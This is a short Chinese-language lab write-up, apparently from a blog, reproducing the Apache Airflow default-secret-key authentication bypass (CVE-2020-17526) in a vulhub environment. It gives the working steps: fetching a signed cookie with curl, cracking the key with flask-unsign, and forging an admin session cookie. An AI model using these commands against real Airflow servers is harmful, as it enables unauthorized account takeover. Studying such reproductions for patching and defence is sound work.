vulhub中Apache Airflow 默认密钥导致的权限绕过(CVE-2020-17526)

Apache Airflow是一款开源的,分布式任务调度框架。默认情况下,Apache Airflow无需用户认证,但管理员也可以通过指定`webserver.authenticate=True`来开启认证。

在其1.10.13版本及以前,即使开启了认证,攻击者也可以通过一个默认密钥来绕过登录,伪造任意用户。

vulhub中Apache Airflow 默认密钥导致的权限绕过(CVE-2020-17526)_第1张图片

1.访问登录页面,服务器会返回一个签名后的Cookie:
curl -v http://localhost:8080/admin/airflow/login

vulhub中Apache Airflow 默认密钥导致的权限绕过(CVE-2020-17526)_第2张图片

2.使用[flask-unsign](https://github.com/Paradoxis/Flask-Unsign)这个工具来爆破签名时使用的`SECRET_KEY`

安装flask-unsign
pip install flask-unsign[wordlist]
pip install flask-unsign
flask-unsign -u -c [session from Cookie]

vulhub中Apache Airflow 默认密钥导致的权限绕过(CVE-2020-17526)_第3张图片

3.Bingo,成功爆破出Key是`temporary_key`。使用这个key生成一个新的session,其中伪造`user_id`为1

flask-unsign -s --secret temporary_key -c "{'user_id': '1', '_fresh': False, '_permanent': True}"

4.在浏览器中使用这个新生成的session,可见已成功登录

vulhub中Apache Airflow 默认密钥导致的权限绕过(CVE-2020-17526)_第4张图片

你可能感兴趣的:(vulhub漏洞复现,apache)